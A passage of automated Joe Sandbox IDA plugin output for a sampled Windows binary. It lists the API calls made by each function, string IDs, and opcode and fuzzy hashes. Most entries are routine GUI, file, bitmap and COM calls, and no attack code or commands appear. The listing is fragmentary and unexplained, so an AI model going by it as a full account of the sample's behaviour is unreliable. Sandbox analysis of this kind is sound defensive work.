• _memset.LIBCMT ref: 004669C4
• _wcsncpy.LIBCMT ref: 00466A21
• _wcsncpy.LIBCMT ref: 00466A4D
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• _wcstok.LIBCMT ref: 00466A90
  • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
• _wcstok.LIBCMT ref: 00466B3F
• _wcscpy.LIBCMT ref: 00466BC8
• GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
• _wcslen.LIBCMT ref: 00466D1D
• _memset.LIBCMT ref: 00466BEE
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• _wcslen.LIBCMT ref: 00466D4B
• GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
Strings
Similarity
• API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
• String ID: X$HH
• API String ID: 3021350936-1944015008
APIs
• _memset.LIBCMT ref: 0045F4AE
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
• SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
• Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
Strings
Similarity
• API ID: InfoItemMenu$Sleep_memset
• String ID: 0
• API String ID: 1504565804-4108050209
APIs
• DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
Strings
Similarity
• API ID: Window$CreateDestroy
• String ID: ,$tooltips_class32
• API String ID: 1109047481-3856767331
APIs
• _wcsncpy.LIBCMT ref: 0045CCFA
• __wsplitpath.LIBCMT ref: 0045CD3C
• _wcscat.LIBCMT ref: 0045CD51
• _wcscat.LIBCMT ref: 0045CD63
• GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
• GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
• SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
• SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
• _wcscpy.LIBCMT ref: 0045CE14
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
Strings
Similarity
• API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
• String ID: *.*
• API String ID: 1153243558-438819550
APIs
• _memset.LIBCMT ref: 00455127
• GetMenuItemInfoW.USER32 ref: 00455146
• DeleteMenu.USER32(?,?,00000000), ref: 004551B2
• DeleteMenu.USER32(?,?,00000000), ref: 004551C8
• GetMenuItemCount.USER32(?), ref: 004551D9
• SetMenu.USER32(?,00000000), ref: 004551E7
• DestroyMenu.USER32(?,?,00000000), ref: 004551F4
• DrawMenuBar.USER32 ref: 00455207
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Strings
                                                                              Similarity
                                                                              • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1663942905-4108050209
                                                                              • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                              • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                              • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                              • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 1481289235-0
                                                                              • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                              • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                                                              • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                              • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                              APIs
                                                                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                              • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                              • SendMessageW.USER32 ref: 0046FBAF
                                                                              • SendMessageW.USER32 ref: 0046FBE2
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                              • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                              • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                              • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                              • SendMessageW.USER32 ref: 0046FD00
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                              • String ID:
                                                                              • API String ID: 2632138820-0
                                                                              • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                              • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                              • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                              • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                              APIs
                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                                              • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CursorLoad
                                                                              • String ID:
                                                                              • API String ID: 3238433803-0
                                                                              • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                              • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                              • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                              • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                              APIs
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                              • _wcslen.LIBCMT ref: 00460B00
                                                                              • __swprintf.LIBCMT ref: 00460B9E
                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                              • GetDlgCtrlID.USER32(?), ref: 00460CE6
                                                                              • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                              • GetParent.USER32(?), ref: 00460D40
                                                                              • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                              • String ID: %s%u
                                                                              • API String ID: 1899580136-679674701
                                                                              • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                              • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                                                              • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                              • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                                                              APIs
                                                                              • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                                              • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                                              • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                              • API String ID: 2485709727-934586222
                                                                              • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                              • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                                              • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                              • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                              • String ID: HH
                                                                              • API String ID: 3381189665-2761332787
                                                                              • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                              • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                              • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                              • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 00434585
                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                              • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                              • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                              • String ID: (
                                                                              • API String ID: 3300687185-3887548279
                                                                              • Opcode ID: a49f41e91dac5baa2c50b775dc8de30f0d01d64d4146e99f951c4697ae3d27a6
                                                                              • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                              • Opcode Fuzzy Hash: a49f41e91dac5baa2c50b775dc8de30f0d01d64d4146e99f951c4697ae3d27a6
                                                                              • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                                              APIs
                                                                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                              • __swprintf.LIBCMT ref: 0045E4D9
                                                                              • _printf.LIBCMT ref: 0045E595
                                                                              • _printf.LIBCMT ref: 0045E5B7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString_printf$__swprintf_wcslen
                                                                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                              • API String ID: 3590180749-2894483878
                                                                              • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                              • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                              • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                              • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                                                                              • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                              • DeleteObject.GDI32(?), ref: 0046F950
                                                                              • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                                                                              • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                              • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                              • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                              • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                              • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                              • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                              • DeleteObject.GDI32(?), ref: 0046FA68
                                                                              • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                              • String ID:
                                                                              • API String ID: 3412594756-0
                                                                              • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                              • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                              • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                              • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                              APIs
                                                                                • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                              • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                              • API String ID: 4013263488-4113822522
                                                                              • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                              • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                              • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                              • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                                              • String ID:
                                                                              • API String ID: 228034949-0
                                                                              • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                              • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                                                              • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                              • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                              • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                                              • DeleteObject.GDI32(?), ref: 00433603
                                                                              • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                              • String ID:
                                                                              • API String ID: 3969911579-0
                                                                              • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                              • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                              • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                              • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                              APIs
                                                                              • GetParent.USER32 ref: 00445A8D
                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                              • __wcsicoll.LIBCMT ref: 00445AC4
